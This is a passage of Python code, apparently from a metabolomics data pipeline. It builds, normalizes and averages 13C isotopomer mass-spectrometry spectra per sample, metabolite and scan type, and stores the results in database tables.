peakSpectrum_stats,peakSpectrum_theoretical = self.compare_peakSpectrum_normMax(peakSpectrum_normalized_lst,True);
# update data_stage01_isotopomer_averages
for frag,spec in peakSpectrum_theoretical.items():
if spec:
fragment_str = re.sub('[+-]', '', frag);
fragment_mass = Formula(fragment_str).isotope.mass;
for k,v in peakSpectrum_theoretical[frag].items():
if v and k in peakSpectrum_stats[frag]:
if peakSpectrum_stats[frag][k]['mean']> 0.0: intensities_cv = peakSpectrum_stats[frag][k]['stdDev']/peakSpectrum_stats[frag][k]['mean']*100;
else: intensities_cv = 0.0;
row = [];
row = data_stage01_isotopomer_averages(experiment_id_I, sna, sample_types_lst[sna_cnt], tp, met,frag, k,
peakSpectrum_stats[frag][k]['n'], peakSpectrum_stats[frag][k]['mean'], intensities_cv,
'normMax', v, peakSpectrum_stats[frag][k]['absDev'], scan_type, True);
elif v and k not in peakSpectrum_stats[frag]:
intensities_cv = None;
row = [];
row = data_stage01_isotopomer_averages(experiment_id_I, sna, sample_types_lst[sna_cnt], tp, met,frag, k,
None, None, intensities_cv,
'normMax', v, None, scan_type, True);
elif not v and k in peakSpectrum_stats[frag]:
if peakSpectrum_stats[frag][k]['mean']> 0.0: intensities_cv = peakSpectrum_stats[frag][k]['stdDev']/peakSpectrum_stats[frag][k]['mean']*100;
else: intensities_cv = 0.0;
row = [];
row = data_stage01_isotopomer_averages(experiment_id_I, sna, sample_types_lst[sna_cnt], tp, met,frag, k,
peakSpectrum_stats[frag][k]['n'], peakSpectrum_stats[frag][k]['mean'], intensities_cv,
'normMax', None, peakSpectrum_stats[frag][k]['absDev'], scan_type, True);
self.session.add(row);
self.session.commit();
def execute_buildSpectrumFromPeakData(self,experiment_id_I,ms_methodtype_I='isotopomer_13C',sample_name_abbreviations_I = None,met_ids_I = None):
'''Build spectrum from raw peak data'''
'''Assumptions:
Only 1 precursur:spectrum per sample name and
only 1 precursor:spectrum per dilution
(i.e. the best/most representative precursor:spectrum was chose from the
available EPI scans and dilutions of that particular precursor)
'''
# extract out the peakSpectrum
# get sample names for the experiment
print('execute_buildSpectrumFromPeakData...')
if sample_name_abbreviations_I:
sample_names = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for sna in sample_name_abbreviations_I:
for st in sample_types:
sample_names_tmp = [];
sample_names_tmp = self.stage01_isotopomer_query.get_sampleNames_experimentIDAndSampleTypeAndSampleNameAbbreviation_peakData(experiment_id_I,st,sna);
sample_names.extend(sample_names_tmp);
sample_types_lst.extend([st for i in range(len(sample_names_tmp))]);
else:
sample_names = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for st in sample_types:
sample_names_tmp = [];
sample_names_tmp = self.stage01_isotopomer_query.get_sampleNames_experimentIDAndSampleType_peakData(experiment_id_I,st);
sample_names.extend(sample_names_tmp);
sample_types_lst.extend([st for i in range(len(sample_names_tmp))]);
# create database table
for sn_cnt,sn in enumerate(sample_names):
print('building spectrum for sample ' + sn);
# get other information about the sample for later use
sample_name_abbreviation,time_point,replicate_numbers = None,None,None;
sample_name_abbreviation,time_point,replicate_numbers = self.stage01_isotopomer_query.get_sampleNameAbbreviationsAndOther_experimentIDAndSampleName_peakData(experiment_id_I,sn);
# get met_id and precursor_formula for each sample
scan_type = [];
scan_type = self.stage01_isotopomer_query.get_scanType_experimentIDAndSampleName_peakData(experiment_id_I,sn);
for scantype in scan_type:
print('building spectrum for scan type ' + scantype);
# get met_id and precursor formula for each sample
if met_ids_I:
met_id, precursor_formula = [], [];
for met in met_ids_I:
met_id_tmp, precursor_formula_tmp = [], []
met_id_tmp, precursor_formula_tmp = self.stage01_isotopomer_query.get_metIDAndPrecursorFormula_experimentIDAndSampleNameAndScanTypeAndMetID_peakData(experiment_id_I,sn,scantype,met);
met_id.extend(met_id_tmp);
precursor_formula.extend(precursor_formula_tmp);
else:
met_id, precursor_formula = [], [];
met_id, precursor_formula = self.stage01_isotopomer_query.get_metIDAndPrecursorFormula_experimentIDAndSampleNameAndScanType_peakData(experiment_id_I,sn,scantype);
for precursor_cnt, precursor in enumerate(precursor_formula):
print('building spectrum for met_id/precursor ' + met_id[precursor_cnt] + '/' + precursor);
precursor_str = re.sub('[+-]', '', precursor);
precursor_mass = Formula(precursor_str).isotope.mass
# get all product fragments for the met_id/precursor
precursor_formulas_monoisotopic, product_formulas = [], [];
precursor_formulas_monoisotopic, product_formulas = self.stage01_isotopomer_query.get_precursorAndProductFormulas_metID(met_id[precursor_cnt],'-','tuning');
product_formulas.append(precursor_formulas_monoisotopic[0]); # add precursor to list of fragments
# get peak data for the sample/met_id/precursor_formula
peak_data = [];
peak_data = self.stage01_isotopomer_query.get_data_experimentIDAndSampleNameAndMetIDAndPrecursorFormulaAndScanType_peakData(experiment_id_I,sn,met_id[precursor_cnt],precursor,scantype);
peakSpectrum_measured,\
peakSpectrum_corrected, peakSpectrum_normalized = self.extract_peakData_normMax(\
peak_data, product_formulas, 0.3, True);
peakSpectrum_stats,peakSpectrum_theoretical = self.compare_peakSpectrum_normMax([peakSpectrum_normalized],True);
# update data_stage01_isotopomer_normalized
for frag,spec in peakSpectrum_theoretical.items():
if spec:
product_str = re.sub('[+-]', '', frag);
product_mass = Formula(product_str).isotope.mass;
for k,v in peakSpectrum_theoretical[frag].items():
row1 = None;
row1 = data_stage01_isotopomer_peakSpectrum(experiment_id_I,sn,sample_name_abbreviation,
sample_types_lst[sn_cnt],time_point,replicate_numbers,
met_id[precursor_cnt],precursor,int(numpy.round(precursor_mass)),
frag,int(numpy.round(k)),
peakSpectrum_measured[frag][k],'cps',
peakSpectrum_corrected[frag][k],'cps',
peakSpectrum_normalized[frag][k],'normMax',
v,peakSpectrum_stats[frag][k]['absDev'],scantype,True,None);
self.session.add(row1);
self.session.commit();
def execute_updatePeakSpectrum(self,experiment_id_I,sample_name_abbreviations_I = None):
'''re-calculate intensity_normalized from intensity_corrected and used'''
# extract out the peakSpectrum
dataListUpdated = [];
# get sample names for the experiment
print('execute_updatePeakSpectrum...')
if sample_name_abbreviations_I:
sample_names = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for sna in sample_name_abbreviations_I:
for st in sample_types:
sample_names_tmp = [];
sample_names_tmp = self.stage01_isotopomer_query.get_sampleNames_experimentIDAndSampleTypeAndSampleNameAbbreviation_peakSpectrum(experiment_id_I,st,sna);
sample_names.extend(sample_names_tmp);
sample_types_lst.extend([st for i in range(len(sample_names_tmp))]);
else:
sample_names = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for st in sample_types:
sample_names_tmp = [];
sample_names_tmp = self.stage01_isotopomer_query.get_sampleNames_experimentIDAndSampleType_peakSpectrum(experiment_id_I,st);
sample_names.extend(sample_names_tmp);
sample_types_lst.extend([st for i in range(len(sample_names_tmp))]);
# create database table
for sn_cnt,sn in enumerate(sample_names):
print('updating peak spectrum for sample ' + sn);
# get other information about the sample for later use
sample_name_abbreviation,time_point,replicate_numbers = None,None,None;
sample_name_abbreviation,time_point,replicate_numbers = self.stage01_isotopomer_query.get_sampleNameAbbreviationsAndTimePointAndReplicateNumber_experimentIDAndSampleName_peakSpectrum(experiment_id_I,sn);
# get met_id and precursor_formula for each sample
scan_type = [];
scan_type = self.stage01_isotopomer_query.get_scanType_experimentIDAndSampleName_peakSpectrum(experiment_id_I,sn);
for scantype in scan_type:
print('building spectrum for scan type ' + scantype);
# get met_id and precursor formula for each sample
met_id, precursor_formula = [], [];
met_id, precursor_formula = self.stage01_isotopomer_query.get_metIDAndPrecursorFormula_experimentIDAndSampleNameAndScanType_peakSpectrum(experiment_id_I,sn,scantype);
for precursor_cnt, precursor in enumerate(precursor_formula):
print('updating peak spectrum for met_id/precursor ' + met_id[precursor_cnt] + '/' + precursor);
precursor_str = re.sub('[+-]', '', precursor);
precursor_mass = Formula(precursor_str).isotope.mass
# get all product fragments for the met_id/precursor
precursor_formulas_monoisotopic, product_formulas = [], [];
precursor_formulas_monoisotopic, product_formulas = self.stage01_isotopomer_query.get_precursorAndProductFormulas_metID(met_id[precursor_cnt],'-','tuning');
product_formulas.append(precursor_formulas_monoisotopic[0]); # add precursor to list of fragments
# get peak data for the sample/met_id/precursor_formula
peak_data = [];
peak_data = self.stage01_isotopomer_query.get_data_experimentIDAndSampleNameAndMetIDAndPrecursorFormulaAndScanType_peakSpectrum(experiment_id_I,sn,met_id[precursor_cnt],precursor,scantype);
peakSpectrum_corrected, peakSpectrum_normalized = self.extract_peakList_normMax(\
peak_data, product_formulas,True);
peakSpectrum_stats,peakSpectrum_theoretical = self.compare_peakSpectrum_normMax([peakSpectrum_normalized],True);
# update data_stage01_isotopomer_peakSpectrum
for frag,spec in peakSpectrum_theoretical.items():
if spec:
product_str = re.sub('[+-]', '', frag);
product_mass = Formula(product_str).isotope.mass;
for k,v in peakSpectrum_theoretical[frag].items():
dataListUpdated.append({'experiment_id':experiment_id_I,
'sample_name':sn,
'sample_name_abbreviation':sample_name_abbreviation,
'sample_type':sample_types_lst[sn_cnt],
'time_point':time_point,
'replicate_number':replicate_numbers,
'met_id':met_id[precursor_cnt],
'precursor_formula':precursor,
'precursor_mass':int(numpy.round(precursor_mass)),
'product_formula':frag,
'product_mass':int(numpy.round(k)),
'intensity_corrected':peakSpectrum_corrected[frag][k],
'intensity_corrected_units':'cps',
'intensity_normalized':peakSpectrum_normalized[frag][k],
'intensity_normalized_units':'normMax',
'intensity_theoretical':v,
'abs_devFromTheoretical':peakSpectrum_stats[frag][k]['absDev'],
'scan_type':scantype});
self.stage01_isotopomer_query.update_data_stage01_isotopomer_peakSpectrum(dataListUpdated);
def execute_filterValidatedFragments(self,experiment_id_I):
'''Filter fragments that have been validated by a U12C reference experiment'''
print('filtering validated met/fragment pairs...')
dataUpdate_O = [];
for k,v in self.isotopomer_13C_fragments_validated.items():
for frag in v:
dataUpdate_O.append({'experiment_id':experiment_id_I,'met_id':k,'product_formula':frag});
self.stage01_isotopomer_query.update_validFragments_stage01_isotopomer_peakSpectrum(dataUpdate_O);
def execute_normalizeSpectrumFromReference(self,experiment_id_I,sample_name_abbreviations_I = None, use_mrm_ref = True, met_ids_I = None):
# 1. import used peak spectrum to normalized table after multiplying by measured
# scaling factor calculated from used MRM spectrum
# 2. be sure that the MRMs in the normalized table have been finalized
'''NOTES:
cannot follow the forloop pattern used in buildSpectrumFromPeakData (i.e. starting with sample name)
must use the forloop pattern similar to updateNormalizedSpectrum, but without a forloop for dilutions
(i.e. time-point to sample name abbreviations to scan types to mets)
buildSpectrumFromPeakData and updatePeakSpectrum methods process one product:spectrum from a single precursor at a time;
each precursor:product:spectrum is associated with only one sample name
However, because the entire range of precursor:product:spectrum for a given met can encompass multiple dilutions and therefore different
sample names, a more generic approach must be used'''
'''Assumptions:
only a single precursor:spectrum is used_ per sample name abbreviation, time-point, replicate, scan_type
(i.e. there are no multiple dilutions of the same precursor:spectrum that are used_)
'''
# extract out the peakSpectrum
print('execute_normalizeSpectrumFromReference...')
# get time points
time_points = [];
time_points = self.stage01_isotopomer_query.get_timePoints_experimentID_peakSpectrum(experiment_id_I);
for tp in time_points:
print('normalizing peak spectrum from reference for time-point ' + tp);
# get sample name abbreviations
if sample_name_abbreviations_I:
sample_name_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for st in sample_types:
sample_name_abbreviations_tmp = [];
sample_name_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePoint_peakSpectrum(experiment_id_I,st,tp);
sample_name_abbreviations.extend([sna for sna in sample_name_abbreviations_tmp if sna in sample_name_abbreviations_I]);
sample_types_lst.extend([st for sna in sample_name_abbreviations_tmp if sna in sample_name_abbreviations_I]);
else:
sample_name_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for st in sample_types:
sample_name_abbreviations_tmp = [];
sample_name_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePoint_peakSpectrum(experiment_id_I,st,tp);
sample_name_abbreviations.extend(sample_name_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_name_abbreviations_tmp))]);
for sna_cnt,sna in enumerate(sample_name_abbreviations):
print('normalizing peak spectrum from reference for sample name abbreviation ' + sna);
# get scan types
scan_type = [];
scan_type = self.stage01_isotopomer_query.get_scanType_experimentIDAndTimePointSampleNameAbbreviation_peakSpectrum(experiment_id_I,tp,sna);
for scantype in scan_type:
print('normalizing peak spectrum from reference for scan type ' + scantype);
# get replicates
replicate_numbers = [];
replicate_numbers = self.stage01_isotopomer_query.get_replicateNumber_experimentIDAndTimePointAndSampleNameAbbreviationAndScanType_peakSpectrum(experiment_id_I,tp,sna,scantype);
for rep in replicate_numbers:
print('normalizing peak spectrum from reference for replicate ' + str(rep));
# get other information about the sample for later use
sample_name, dilution = None,None;
sample_name,dilution = self.stage01_isotopomer_query.get_sampleNameAndDilution_experimentIDAndTimePointAndSampleNameAbbreviationAndScanType_peakSpectrum(\
experiment_id_I,tp,sna,scantype,rep);
# get met_id
if met_ids_I:
met_id = met_ids_I;
else:
med_id = [];
met_id = self.stage01_isotopomer_query.get_metID_experimentIDAndTimePointAndSampleNameAbbreviationAndScanTypeAndReplicate_peakSpectrum(\
experiment_id_I,tp,sna,scantype,rep);
for met_cnt,met in enumerate(met_id):
print('normalizing peak spectrum from reference for met_id ' + met);
# get precursor formula and mass
precursor_formula, precursor_mass = [], [];
precursor_formula, precursor_mass = self.stage01_isotopomer_query.get_precursorFormulaAndMass_experimentIDAndTimePointAndSampleNameAbbreviationAndScanTypeAndReplicateAndMetID_peakSpectrum(\
experiment_id_I,tp,sna,scantype,rep,met);
peak_data_all = {};
scaling_factors_all = {};
for precursor_cnt, precursor in enumerate(precursor_formula):
peak_data_all[precursor] = None;
scaling_factors_all[precursor] = None;
print('normalizing peak spectrum from reference for precursor ' + precursor);
precursor_str = re.sub('[+-]', '', precursor);
# get all product fragments for the met_id/precursor
product_formulas = [];
product_formulas = self.stage01_isotopomer_query.get_productFormulas_experimentIDAndTimePointAndSampleNameAbbreviationAndScanTypeAndReplicateAndMetIDAndPrecursorFormula_peakSpectrum(\
experiment_id_I,tp,sna,scantype,rep,met,precursor);
# get the m+0 precursor_formula
precursor_formula_monoisotopic = self.stage01_isotopomer_query.get_precursorFormula_metID(met,'-','tuning');
precursor_monoisotopic_str = re.sub('[+-]', '', precursor_formula_monoisotopic);
precursor_monoisotpoic_mass = int(numpy.round(Formula(precursor_monoisotopic_str).isotope.mass));
# get peakSpectrum data
peak_data = {};
peak_data = self.stage01_isotopomer_query.get_data_experimentIDAndTimePointAndSampleNameAbbreviationAndScanTypeAndReplicateAndMetIDAndPrecursorFormula_peakSpectrum(\
experiment_id_I,tp,sna,scantype,rep,met,precursor);
peak_data_all[precursor] = peak_data;
if scantype == 'ER':
scaling_factors_all[precursor] = 1.0; # there is no need to scale ER or other precursor ion scans
else:
if use_mrm_ref:
# get reference MRM spectrum scaling factor for the sample
#scaling_factor,scaling_factor_cv = None,None; # will need to incorporate propogation of error
#scaling_factor,scaling_factor_cv = self.stage01_isotopomer_query.get_normalizedIntensity_experimentIDAndSampleAbbreviationAndTimePointAndMetIDAndFragmentFormulaAndMassAndScanType_dataStage01Averages(experiment_id_I,sample_name_abbreviation,time_point,met,precursor_formula_monoisotopic,precursor_mass[precursor_cnt],'MRM');
scaling_factor = None; # does not require the propogation of error
scaling_factor = self.stage01_isotopomer_query.get_normalizedIntensity_experimentIDAndSampleAbbreviationAndTimePointAndReplicateNumberAndMetIDAndFragmentFormulaAndMassAndScanType_dataStage01Normalized(experiment_id_I,sna,tp,rep,met,precursor_formula_monoisotopic,precursor_mass[precursor_cnt],'MRM');
if scaling_factor: scaling_factors_all[precursor] = scaling_factor;
else:
scaling_factors_all[precursor] = 0.0;
## substitute with reference spectrum
#refspec = self.report_fragmentSpectrum_normMax([precursor_formula_monoisotopic],True);
#scaling_factor = refspec[precursor_formula_monoisotopic][precursor_mass[precursor_cnt]];
#scaling_factors_all[precursor] = scaling_factor;
else:
# get reference ER spectrum scaling factor for the sample
scaling_factor = None;
scaling_factor = self.stage01_isotopomer_query.get_normalizedIntensity_experimentIDAndSampleAbbreviationAndTimePointAndReplicateNumberAndMetIDAndPrecursorFormulaAndMassAndScanType_peakSpectrum(experiment_id_I,sna,tp,rep,met,precursor_formula_monoisotopic,precursor_mass[precursor_cnt],'ER');
if scaling_factor: scaling_factors_all[precursor] = scaling_factor;
else:
scaling_factors_all[precursor] = 0.0;
## substitute with reference spectrum
#refspec = self.report_fragmentSpectrum_normMax([precursor_formula_monoisotopic],True);
#scaling_factor = refspec[precursor_formula_monoisotopic][precursor_mass[precursor_cnt]];
#scaling_factors_all[precursor] = scaling_factor;
# normalize spectrum to reference MRM for each precursor (m+0,m+1,...)
peakSpectrum_normalized = self.normalize_peakSpectrum_normMax(peak_data_all,scaling_factors_all);
peakSpectrum_stats,peakSpectrum_theoretical = self.compare_peakSpectrum_normMax([peakSpectrum_normalized],True);
# update data_stage01_isotopomer_peakSpectrum
for frag,spec in peakSpectrum_theoretical.items():
if spec:
product_str = re.sub('[+-]', '', frag);
product_mass = Formula(product_str).isotope.mass;
for k,v in peakSpectrum_theoretical[frag].items():
if k in peakSpectrum_normalized[frag]:
row = None;
row = data_stage01_isotopomer_normalized(experiment_id_I,sample_name,sna,sample_types_lst[sna_cnt],tp,dilution,rep,
met,frag,int(numpy.round(k)),
#None,'cps',None,'cps',
None,'cps',peakSpectrum_normalized[frag][k],'normMax', #allows for spectrum updates
peakSpectrum_normalized[frag][k],'normMax',
v,peakSpectrum_stats[frag][k]['absDev'],scantype,True,None);
self.session.add(row);
self.session.commit();
def execute_normalizeSpectrumFromReference_v1(self,experiment_id_I,sample_name_abbreviations_I = None,use_mrm_ref = True):
# 1. import used peak spectrum to normalized table after multiplying by measured
# scaling factor calculated from used MRM spectrum
# 2. be sure that the MRMs in the normalized table have been finalized
'''NOTES: Broken for the following reason:
cannot follow the forloop pattern used in buildSpectrumFromPeakData (i.e. starting with sample name)
must use the forloop pattern used in updateNormalizedSpectrum (i.e. time-point to dilutions to sample name abbreviations to scan types to mets)
buildSpectrumFromPeakData and updatePeakSpectrum methods process one product:spectrum from a single precursor at a time;
each precursor:product:spectrum is associated with only one sample name
However, because the entire range of precursor:product:spectrum for a given met can encompass multiple dilutions and therefore different
sample names, a more generic approach must be used
Please use current version'''
# extract out the peakSpectrum
# get sample name for the experiment
print('execute_normalizeSpectrumFromReference...')
if sample_name_abbreviations_I:
sample_names = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for sna in sample_name_abbreviations_I:
for st in sample_types:
sample_names_tmp = [];
sample_names_tmp = self.stage01_isotopomer_query.get_sampleNames_experimentIDAndSampleTypeAndSampleNameAbbreviation_peakSpectrum(experiment_id_I,st,sna);
sample_names.extend(sample_names_tmp);
sample_types_lst.extend([st for i in range(len(sample_names_tmp))]);
else:
sample_names = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for st in sample_types:
sample_names_tmp = [];
sample_names_tmp = self.stage01_isotopomer_query.get_sampleNames_experimentIDAndSampleType_peakSpectrum(experiment_id_I,st);
sample_names.extend(sample_names_tmp);
sample_types_lst.extend([st for i in range(len(sample_names_tmp))]);
for sn_cnt,sn in enumerate(sample_names):
print('normalizing peak spectrum for sample ' + sn);
# get other information about the sample for later use
sample_name_abbreviation,time_point,dilution,replicate_numbers = None,None,None,None;
sample_name_abbreviation,time_point,dilution,replicate_numbers = self.stage01_isotopomer_query.get_sampleNameAbbreviationsAndOther_experimentIDAndSampleName_peakSpectrum(experiment_id_I,sn);
# get met_id and precursor_formula for each sample
scan_type = [];
scan_type = self.stage01_isotopomer_query.get_scanType_experimentIDAndSampleName_peakSpectrum(experiment_id_I,sn);
for scantype in scan_type:
print('normalizing spectrum for scan type ' + scantype);
# get met_id
med_id = [];
met_id = self.stage01_isotopomer_query.get_metID_experimentIDAndSampleNameAndScanType_peakSpectrum(experiment_id_I,sn,scantype);
for met in met_id:
print('normalizing peak spectrum for met_id ' + met);
# get precursor formula and mass
precursor_formula, precursor_mass = [], [];
precursor_formula, precursor_mass = self.stage01_isotopomer_query.get_precursorFormulaAndMass_experimentIDAndSampleNameAndMetIDAndScanType_peakSpectrum(experiment_id_I,sn,met,scantype);
peak_data_all = {};
scaling_factors_all = {};
for precursor_cnt, precursor in enumerate(precursor_formula):
peak_data_all[precursor] = None;
scaling_factors_all[precursor] = None;
print('normalizing peak spectrum for precursor ' + precursor);
precursor_str = re.sub('[+-]', '', precursor);
# get all product fragments for the met_id/precursor
product_formulas = [];
product_formulas = self.stage01_isotopomer_query.get_productFormulas_experimentIDAndSampleNameAndMetIDAndPrecursorFormulaAndScanType_peakSpectrum(experiment_id_I,sn,met,precursor,scantype);
# get the m+0 precursor_formula
precursor_formula_monoisotopic = self.stage01_isotopomer_query.get_precursorFormula_metID(met,'-','tuning');
precursor_monoisotopic_str = re.sub('[+-]', '', precursor_formula_monoisotopic);
precursor_monoisotpoic_mass = int(numpy.round(Formula(precursor_monoisotopic_str).isotope.mass));
# get peakSpectrum data
peak_data = {};
#Change to sna+rep+timepoint:peak_data = self.stage01_isotopomer_query.get_normalizedIntensity_experimentIDAndSampleNameAndMetIDAndPrecursorFormulaAndScanType_peakSpectrum(experiment_id_I,sn,met,precursor,scantype);
peak_data_all[precursor] = peak_data;
if scantype == 'ER':
scaling_factors_all[precursor] = 1.0; # there is no need to scale ER or other precursor ion scans
else:
if use_mrm_ref:
# get reference MRM spectrum scaling factor for the sample
#scaling_factor,scaling_factor_cv = None,None; # will need to incorporate propogation of error
#scaling_factor,scaling_factor_cv = self.stage01_isotopomer_query.get_normalizedIntensity_experimentIDAndSampleAbbreviationAndTimePointAndMetIDAndFragmentFormulaAndMassAndScanType_dataStage01Averages(experiment_id_I,sample_name_abbreviation,time_point,met,precursor_formula_monoisotopic,precursor_mass[precursor_cnt],'MRM');
scaling_factor = None; # does not require the propogation of error
scaling_factor = self.stage01_isotopomer_query.get_normalizedIntensity_experimentIDAndSampleAbbreviationAndTimePointAndReplicateNumberAndMetIDAndFragmentFormulaAndMassAndScanType_dataStage01Normalized(experiment_id_I,sample_name_abbreviation,time_point,replicate_numbers,met,precursor_formula_monoisotopic,precursor_mass[precursor_cnt],'MRM');
if scaling_factor: scaling_factors_all[precursor] = scaling_factor;
else:
scaling_factors_all[precursor] = 0.0;
## substitute with reference spectrum
#refspec = self.report_fragmentSpectrum_normMax([precursor_formula_monoisotopic],True);
#scaling_factor = refspec[precursor_formula_monoisotopic][precursor_mass[precursor_cnt]];
#scaling_factors_all[precursor] = scaling_factor;
else:
# get reference ER spectrum scaling factor for the sample
scaling_factor = None;
scaling_factor = self.stage01_isotopomer_query.get_normalizedIntensity_experimentIDAndSampleAbbreviationAndTimePointAndReplicateNumberAndMetIDAndPrecursorFormulaAndMassAndScanType_peakSpectrum(experiment_id_I,sample_name_abbreviation,time_point,replicate_numbers,met,precursor_formula_monoisotopic,precursor_mass[precursor_cnt],'ER');
if scaling_factor: scaling_factors_all[precursor] = scaling_factor;
else:
scaling_factors_all[precursor] = 0.0;
## substitute with reference spectrum
#refspec = self.report_fragmentSpectrum_normMax([precursor_formula_monoisotopic],True);
#scaling_factor = refspec[precursor_formula_monoisotopic][precursor_mass[precursor_cnt]];
#scaling_factors_all[precursor] = scaling_factor;
# normalize spectrum to reference MRM for each precursor (m+0,m+1,...)
peakSpectrum_normalized = self.normalize_peakSpectrum_normMax(peak_data_all,scaling_factors_all);
peakSpectrum_stats,peakSpectrum_theoretical = self.compare_peakSpectrum_normMax([peakSpectrum_normalized],True);
# update data_stage01_isotopomer_peakSpectrum
for frag,spec in peakSpectrum_theoretical.items():
if spec:
product_str = re.sub('[+-]', '', frag);
product_mass = Formula(product_str).isotope.mass;
for k,v in peakSpectrum_theoretical[frag].items():
if k in peakSpectrum_normalized[frag]:
row = None;
row = data_stage01_isotopomer_normalized(experiment_id_I,sn,sample_name_abbreviation,sample_types_lst[sn_cnt],time_point,dilution,replicate_numbers,
met,frag,int(numpy.round(k)),
None,'cps',None,'cps',
peakSpectrum_normalized[frag][k],'normMax',
v,peakSpectrum_stats[frag][k]['absDev'],scantype,True);
self.session.add(row);
self.session.commit();
def execute_analyzeAveragesNormSum(self,experiment_id_I, sample_names_I = None, sample_name_abbreviations_I = None, met_ids_I = None, scan_types_I = None):
'''calculate the average normalized intensity for all samples and scan types'''
'''Assumptions:
only a single fragment:spectrum is used_ per sample name abbreviation, time-point, replicate, scan_type
(i.e. there are no multiple dilutions of the same precursor:spectrum that are used_)
'''
print('execute_analyzeAveragesNormSum...')
# get time points
time_points = self.stage01_isotopomer_query.get_timePoint_experimentID_dataStage01Normalized(experiment_id_I);
for tp in time_points:
print('Calculating average precursor and product spectrum from isotopomer normalized for time-point ' + str(tp));
if sample_names_I:
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for sn in sample_names_I:
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePointAndSampleName_dataStage01Normalized(experiment_id_I,st,tp,sn);
sample_abbreviations.extend(sample_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_names_tmp))]);
elif sample_name_abbreviations_I:
sample_abbreviations = sample_name_abbreviations_I;
sample_types_lst = ['Unknown' for x in sample_abbreviations];
# query sample types from sample name abbreviations and time-point from data_stage01_isotopomer_normalized
else:
# get sample names and sample name abbreviations
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePoint_dataStage01Normalized(experiment_id_I,st,tp);
sample_abbreviations.extend(sample_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_abbreviations_tmp))]);
for sna_cnt,sna in enumerate(sample_abbreviations):
print('Calculating average precursor and product spectrum from isotopomer normalized for sample name abbreviation ' + sna);
# get the scan_types
if scan_types_I:
scan_types = [];
scan_types_tmp = [];
scan_types_tmp = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Normalized(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
scan_types = [st for st in scan_types_tmp if st in scan_types_I];
else:
scan_types = [];
scan_types = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Normalized(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
for scan_type in scan_types:
print('Calculating average precursor and product spectrum for scan type ' + scan_type)
# met_ids
if not met_ids_I:
met_ids = [];
met_ids = self.stage01_isotopomer_query.get_metIDs_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanType_dataStage01Normalized( \
experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type);
else:
met_ids = met_ids_I;
if not(met_ids): continue #no component information was found
for met in met_ids:
print('Calculating average precursor and product spectrum for metabolite ' + met);
# get replicates
replicate_numbers = [];
replicate_numbers = self.stage01_isotopomer_query.get_replicateNumbers_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetID_dataStage01Normalized( \
experiment_id_I,sna,tp,scan_type,met);
peakSpectrum_normalized_lst = [];
for rep in replicate_numbers:
print('Calculating average precursor and product spectrum for replicate_number ' + str(rep));
#get data
peakData_I = {};
peakData_I = self.stage01_isotopomer_query.get_dataNormalized_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetIDAndReplicateNumber_dataStage01Normalized( \
experiment_id_I,sna,tp,scan_type,met,rep);
fragment_formulas = list(peakData_I.keys());
peakSpectrum_corrected, peakSpectrum_normalized = self.extract_peakList_normSum(\
peakData_I, fragment_formulas, True);
peakSpectrum_normalized_lst.append(peakSpectrum_normalized);
peakSpectrum_stats,peakSpectrum_theoretical = self.compare_peakSpectrum_normSum(peakSpectrum_normalized_lst,True);
# update data_stage01_isotopomer_normalized
for frag,spec in peakSpectrum_theoretical.items():
if spec:
fragment_str = re.sub('[+-]', '', frag);
fragment_mass = Formula(fragment_str).isotope.mass;
for k,v in peakSpectrum_theoretical[frag].items():
if v and k in peakSpectrum_stats[frag]:
if peakSpectrum_stats[frag][k]['mean']> 0.0: intensities_cv = peakSpectrum_stats[frag][k]['stdDev']/peakSpectrum_stats[frag][k]['mean']*100;
else: intensities_cv = 0.0;
row = [];
row = data_stage01_isotopomer_averagesNormSum(experiment_id_I, sna, sample_types_lst[sna_cnt], tp, met,frag, k,
peakSpectrum_stats[frag][k]['n'], peakSpectrum_stats[frag][k]['mean'], intensities_cv,
'normSum', v, peakSpectrum_stats[frag][k]['absDev'], scan_type, True);
elif v and k not in peakSpectrum_stats[frag]:
intensities_cv = None;
row = [];
row = data_stage01_isotopomer_averagesNormSum(experiment_id_I, sna, sample_types_lst[sna_cnt], tp, met,frag, k,
None, None, intensities_cv,
'normSum', v, None, scan_type, True);
elif not v and k in peakSpectrum_stats[frag]:
if peakSpectrum_stats[frag][k]['mean']> 0.0: intensities_cv = peakSpectrum_stats[frag][k]['stdDev']/peakSpectrum_stats[frag][k]['mean']*100;
else: intensities_cv = 0.0;
row = [];
row = data_stage01_isotopomer_averagesNormSum(experiment_id_I, sna, sample_types_lst[sna_cnt], tp, met,frag, k,
peakSpectrum_stats[frag][k]['n'], peakSpectrum_stats[frag][k]['mean'], intensities_cv,
'normSum', None, peakSpectrum_stats[frag][k]['absDev'], scan_type, True);
self.session.add(row);
self.session.commit();
